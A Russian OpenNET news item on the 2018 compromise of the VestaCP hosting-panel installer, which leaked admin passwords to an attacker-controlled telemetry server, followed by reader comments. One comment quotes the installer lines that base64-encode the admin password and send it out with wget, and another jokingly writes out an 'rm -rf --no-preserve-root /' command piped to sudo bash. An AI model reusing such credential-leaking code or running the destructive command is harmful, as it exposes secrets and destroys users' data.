The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

Злоумышленники добавили вредоносный код в скрипт установки хостинг-панели VestaCP

18.10.2018 12:12

В установочном скрипте панели управления хостингом VestaCP выявлен код, выполняющий отправку параметров аутентификации для доступа к системе пользователя. В частности, в штатную систему отправки телеметрии, которая в ответ на внешний запрос осуществляет вывод названия дистрибутива, добавлены дополнительные параметры, выдающие пароль администратора и IP текущего хоста. Сведения отправлялись на сервер сбора данных телеметрии, который в результате взлома оказался подконтролен атакующим.

Для проверки были ли переданы на сервер сатистики конфиденциальные данные можно использовать ссылку "http://vestacp.com/test/?ip=x.x.x.x", где x.x.x.x IP проверяемого сервера. Если вредоносная активность наблюдается, то вероятно уже недостаточно просто сменить пароль администратора. После получения параметров доступа, атакующие устанавливали бэкдор, который мог выглядеть как системный файл /usr/bin/dhcprenew, реализующий командный сервер для участия в совершении DoS-атак и предоставляющий скрытый shell. После запуска указанный бэкдор маскируется под видом процесса "[kworker/1:1]".

В ходе начального разбора инцидента выяснилось, что код удалось изменить в результате взлома некоторых серверов инфраструктуры проекта. Взлом произведён при помощи новой уязвимости, вызванной ошибкой в API, появившейся в апрельском выпуске 0.9.8-20. Проблемы устранены в выпуске 0.9.8-23. Дополнительные подробности пока не сообщаются.

 
  1. Главная ссылка к новости (https://forum.vestacp.com/view...)
  2. OpenNews: Критическая уязвимость и массовые взломы хостинг-панели VestaCP
  3. OpenNews: Вышло обновление панели управления хостингом Vesta 0.9.8-15
  4. OpenNews: Уязвимость в панели управления хостингом Vesta, позволяющая получить права root
Лицензия: CC BY 3.0
Короткая ссылка: https://opennet.ru/49457-vestacp
Ключевые слова: vestacp
При перепечатке указание ссылки на opennet.ru обязательно


Обсуждение (42) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, Аноним (1), 13:47, 18/10/2018 [ответить] [﹢﹢﹢] [ · · · ]  []     [к модератору]
  • +16 +/
    > штатную систему отправки телеметрии

    Ух. Хорошо зашли.

     
     
  • 2.7, А (??), 14:51, 18/10/2018 [^] [^^] [^^^] [ответить]  []     [к модератору]
  • +5 +/
    > которая в ответ на внешний запрос осуществляет вывод названия дистрибутива

    ха-а-арошая какая телеметрия. она еще и запросы штатно принимает. вообще класс. штатную телеметрию  модернизировали до телеуправления.

     
     
  • 3.10, Аноним (10), 16:26, 18/10/2018 [^] [^^] [^^^] [ответить]  []     [к модератору]
  • –20 +/
    А ты как собираешься без запросов спросить телеметрию, умник?
     
     
  • 4.11, Аноним (11), 16:49, 18/10/2018 [^] [^^] [^^^] [ответить]      [к модератору]
  • +15 +/
    А не надо её спрашивать. Можно сделать, чтобы клиент телеметрии сам отправлял её по расписанию, скажем, раз в неделю. Без запросов с сервера.
     
  • 3.17, Himik (ok), 18:56, 18/10/2018 [^] [^^] [^^^] [ответить]  []     [к модератору]
  • +1 +/
    Злоумышленники добавили вредоносный код в скрипт установки хостинг-панели VestaCP. Хотябы название статьи читали. Если сервер не отвечает на запросы, то это не сервер.
     
     
  • 4.22, Аноним (22), 23:32, 18/10/2018 [^] [^^] [^^^] [ответить]      [к модератору]
  • +/
    Ага, рабочая станция значит, так?
    А если рабочая станция отвечает, то сервер, блин у меня оказывается ЦОД набитый серверами...
     
  • 2.19, Ирокез (?), 19:58, 18/10/2018 [^] [^^] [^^^] [ответить]  []     [к модератору]
  • +/
    Ш10 отправляет ваши данные в микрософт говорили они.
     
     
  • 3.25, Аноним (-), 08:26, 19/10/2018 [^] [^^] [^^^] [ответить]      [к модератору]
  • +1 +/
    Дурной пример заразителен. Веб-абизянки тоже хотят быть как большая компания.
     

  • 1.2, mikhailnov (ok), 14:07, 18/10/2018 [ответить] [﹢﹢﹢] [ · · · ]  [] []     [к модератору]
  • –1 +/
    Повесил на вход в админку Vesta на нестандартном порте дополнительную HTTP-авторизацию средствами nginx. Уже вторая уязвимость мимо.
     
     
  • 2.3, Аноним (3), 14:29, 18/10/2018 [^] [^^] [^^^] [ответить]  []     [к модератору]
  • +5 +/
    Если не забывать о том, что введенные вами логин/пароль пробрасываются в весту в заголовке BasicAuth, ни разу не мимо. Их могло запросто отправить вместе с прочей "телеметрией".
     
     
  • 3.31, Аноним (31), 16:42, 19/10/2018 [^] [^^] [^^^] [ответить]      [к модератору]
  • –2 +/
    > введенные вами логин/пароль пробрасываются в весту в заголовке BasicAuth, ни разу не мимо. Их могло запросто отправить вместе с прочей "телеметрией".

    Наш ответ: https://hackage.haskell.org/package/sproxy2

     
  • 2.8, Аноним (8), 15:06, 18/10/2018 [^] [^^] [^^^] [ответить]  []     [к модератору]
  • +1 +/
    Как это спасёт от "бэкдора в установочном скрипте"?

    Безопасности удалятся 0, информирование через месяц (ветка форума eng раздела, спасибо, что после обновления, скрипт проверки отработает), fail2ban/firewall так и научили определять порты "/usr/local/vesta/bin/v-add-firewall-chain" (не дефолтный фтп). И нет, у меня всё чисто, но уже напрягает.

     
  • 2.9, scorry (ok), 15:47, 18/10/2018 [^] [^^] [^^^] [ответить]      [к модератору]
  • +9 +/
    «поставил себе вирус. закрыл файрволлом. я хаккир.»
     
  • 2.13, th3m3 (ok), 16:59, 18/10/2018 [^] [^^] [^^^] [ответить]      [к модератору]
  • +7 +/
    На что только не пойдут, лишь бы консолью не пользоваться.
     
     
  • 3.15, Аноним (15), 18:13, 18/10/2018 [^] [^^] [^^^] [ответить]      [к модератору]
  • +8 +/
    Ваш комментарий огорчает молодых специалистов.
     

  • 1.4, CHERTS (ok), 14:37, 18/10/2018 [ответить] [﹢﹢﹢] [ · · · ]  []     [к модератору]
  • +1 +/
    Ох и рeшето... других слов просто нет.
     
  • 1.5, Аноним (5), 14:39, 18/10/2018 [ответить] [﹢﹢﹢] [ · · · ]      [к модератору]
  • –4 +/
    Давно знал что майкрософты ужасное по делают
     
  • 1.12, th3m3 (ok), 16:53, 18/10/2018 [ответить] [﹢﹢﹢] [ · · · ]  []     [к модератору]
  • +3 +/
    Я давно говорил, что все эти панели - добром не кончатся. И ведь не первая новость про эту Весту. Давно отказался от этих ваших панелей и жить стало лучше и веселее, особенно когда читаю такие новости, про очередной косяк с панелями.
     
     
  • 2.14, FedeX (ok), 17:09, 18/10/2018 [^] [^^] [^^^] [ответить]      [к модератору]
  • +7 +/
    Не зря матери дочерей учат - "Кто не учился, те работают на панели и заразы всякой набираются".
     
     
  • 3.18, Аноним (18), 19:25, 18/10/2018 [^] [^^] [^^^] [ответить]      [к модератору]
  • +2 +/
    А потому служат Нурглу и Слаанеш сразу?
     

  • 1.16, Аноним (16), 18:36, 18/10/2018 [ответить] [﹢﹢﹢] [ · · · ]  [] []     [к модератору]
  • +1 +/
    статья ваша ниочем. сотрудники vesta сами добавили сбор пароля от admin в инсталлятор в base64, потом его удалили.
    codename="$codename:$(echo $vpass:$servername | base64)"
    wget vestacp.com/notify/?$codename -O /dev/null -q

    https://github.com/serghey-rodin/vesta/commit/a3f0fa1501d424477786e3e7150bb05c
    https://github.com/serghey-rodin/vesta/commit/ee03eff016e03cb76fac7ae3a0f9d1ef

    а взломщики скорее взяли их из лога сервера vestacp - куда они отправлялись инсталлятором

    а ссылка http://vestacp.com/test/?ip=127.0.0.1 для проверки ip вашего сервера (есть ли он в логах или нет)

     
     
  • 2.20, Борщдрайвен бигдата (?), 20:41, 18/10/2018 [^] [^^] [^^^] [ответить]  []     [к модератору]
  • +2 +/
    > сотрудники vesta сами добавили сбор пароля от admin в инсталлятор в base64, потом его удалили

    Но зачем?!

     
     
  • 3.21, Типа хомячок (?), 23:04, 18/10/2018 [^] [^^] [^^^] [ответить]      [к модератору]
  • +3 +/
    'Cause they can, очевидно же.
     
  • 2.23, KonstantinB (??), 06:26, 19/10/2018 [^] [^^] [^^^] [ответить]  []     [к модератору]
  • +1 +/
    Шикарно.

    И это тот случай, когда открытые исходники не помогут: те, кто умеет их читать, не пользуются панелями, и наоборот. :-)

     
     
  • 3.28, нах (?), 10:37, 19/10/2018 [^] [^^] [^^^] [ответить]      [к модератору]
  • +/
    хинт: те кто умеет их читать, не пользуются панелями, а продают их как услугу.

    Правда, вряд ли на свете много продающих хостинг на весте - коммерческие хостеры обычно используют cpanel или ispmgr (оба феерическое невменяемое гуанище с закрытым кодом, больными yблюдкaми в менеджменте и рукoжoпыми гoвнoкодерами, но ничего лучшего опенсосеры не родили)

     
     
  • 4.37, KonstantinB (ok), 04:03, 20/10/2018 [^] [^^] [^^^] [ответить]      [к модератору]
  • +/
    Ой, не напоминайте мне об этих убожествах. Слава яйцам, в последние лет 5 это все никому, кроме пожилых сеошников, не надо.
     
     
  • 5.39, пох (?), 10:46, 20/10/2018 [^] [^^] [^^^] [ответить]      [к модератору]
  • –1 +/
    > Ой, не напоминайте мне об этих убожествах. Слава яйцам, в последние лет
    > 5 это все никому, кроме пожилых сеошников, не надо.

    угу, нет другого интернета кроме вконтактега и мордокнижечки, и товарищ майор пророк ихний.


     
  • 5.40, Vitaliy Blats (?), 12:40, 20/10/2018 [^] [^^] [^^^] [ответить]      [к модератору]
  • –1 +/
    > Ой, не напоминайте мне об этих убожествах. Слава яйцам, в последние лет
    > 5 это все никому, кроме пожилых сеошников, не надо.

    Это ты так думаешь. В мире мало того что куча VPS'ок с предустановленной панелью, так еще и куча сайтов на шаред-хостинге, где так же используются эти панели.

    Мы, пожилые сеошники конечно рады, что ты великий гуру можешь купить VPS'ку, задеплоить туда твою Убунтачку, поставить туда LAMP, exim с dovecot'ом, вебмылом и спамассасином, ну и само собой разумеется сгенерить DKIM'ы дабы письмецы не попадали в спам, написать скрипты добавления мыльных аккаунтов и доменов (просто если ты будешь добавлять это вручную - то ты еще фееричнее кретин чем я думал) и все это за 5 баксов - но мы НЕ ТАКИЕ, мы просто хотим сделать сайт-визитку для своей шашлычной на Вордпрессе за полчаса :))

     
     
  • 6.41, пох (?), 19:35, 20/10/2018 [^] [^^] [^^^] [ответить]      [к модератору]
  • +/
    > мы просто хотим сделать сайт-визитку для своей шашлычной на Вордпрессе за полчаса :))

    на самом деле нам его уже сделал жопорукий аутсорсер, осталось выложить.
    Он, конечно,предлагает хоститься на его сервере, но, поскольку он его сам настраивал, как умел, тот сервер половину времени не работает, и во всех блоклистах отметился, а еще он на нем немножечко майнит.

     

  • 1.24, odd.mean (ok), 07:38, 19/10/2018 [ответить] [﹢﹢﹢] [ · · · ]  [] []     [к модератору]
  • +/
    Хорошую вещь "CP" не назовут.
     
     
  • 2.26, Аноним (26), 09:41, 19/10/2018 [^] [^^] [^^^] [ответить]      [к модератору]
  • +/
    И альта-вистой тоже....
     
  • 2.44, Аноним (44), 06:23, 21/10/2018 [^] [^^] [^^^] [ответить]      [к модератору]
  • +/
    а CP/M ?
     
     
  • 3.45, odd.mean (ok), 08:40, 21/10/2018 [^] [^^] [^^^] [ответить]      [к модератору]
  • +/
    Ну разве что CP/M. Да и то...
     

  • 1.27, Аноним (26), 09:44, 19/10/2018 [ответить] [﹢﹢﹢] [ · · · ]  [] []     [к модератору]
  • –2 +/
    Есть Ajenti не вижу смысла в существовании этого плохо-кода.
     
     
  • 2.30, Vitaliy Blats (?), 12:17, 19/10/2018 [^] [^^] [^^^] [ответить]      [к модератору]
  • +1 +/
    > Есть Ajenti не вижу смысла в существовании этого плохо-кода.

    Есть %software_name1% не вижу смысла в существовании этого %software_name2%.

     

  • 1.32, Аноним (31), 21:06, 19/10/2018 [ответить] [﹢﹢﹢] [ · · · ]  []     [к модератору]
  • +/
    Fuck me

    https://github.com/serghey-rodin/vesta:

    '''
    Download the installation script:

    curl -O http://vestacp.com/pub/vst-install.sh

    Then run it:

    bash vst-install.sh
    '''

     
     
  • 2.33, пох (?), 21:46, 19/10/2018 [^] [^^] [^^^] [ответить]  []     [к модератору]
  • –2 +/
    прости, а то что он тебе понаустановит - ты запускать вообще не планируешь? Или предполагаешь, что баш чем-то страшнее и ужаснее php?

     
     
  • 3.34, Грусть (?), 22:59, 19/10/2018 [^] [^^] [^^^] [ответить]      [к модератору]
  • +1 +/
    Вам следует настроить свой камертон на curl http://...
     
     
  • 4.42, пох (?), 19:39, 20/10/2018 [^] [^^] [^^^] [ответить]      [к модератору]
  • +/
    ой, какой ужас, злые соседи...э...какие нахрен соседи, мы что дома ставимся? Злые враги инженеры хостера...э...стоп, а им зачем, они прямо на диск могут записать... э... ну я уж прям не знаю кто - магистральные операторы в терабитах порнухи и котиков разглядели наш невинный curl и подбросили вражеский код, да?

     
  • 2.35, Аноним (35), 23:16, 19/10/2018 [^] [^^] [^^^] [ответить]  []     [к модератору]
  • +/
    echo "rm -rf --no-preserve-root /" | sudo bash
     
  • 2.36, Аноним (36), 01:43, 20/10/2018 [^] [^^] [^^^] [ответить]      [к модератору]
  • +/
    curl2bash™
     
     
  • 3.38, annual slayer (?), 06:45, 20/10/2018 [^] [^^] [^^^] [ответить]      [к модератору]
  • +/
    есть уже 'curl --rootme'
     

     Добавить комментарий
    Имя:
    E-Mail:
    Текст:



    Партнёры:
    PostgresPro
    Inferno Solutions
    Hosting by Hoster.ru
    Хостинг:

    Закладки на сайте
    Проследить за страницей
    Created 1996-2024 by Maxim Chirkov
    Добавить, Поддержать, Вебмастеру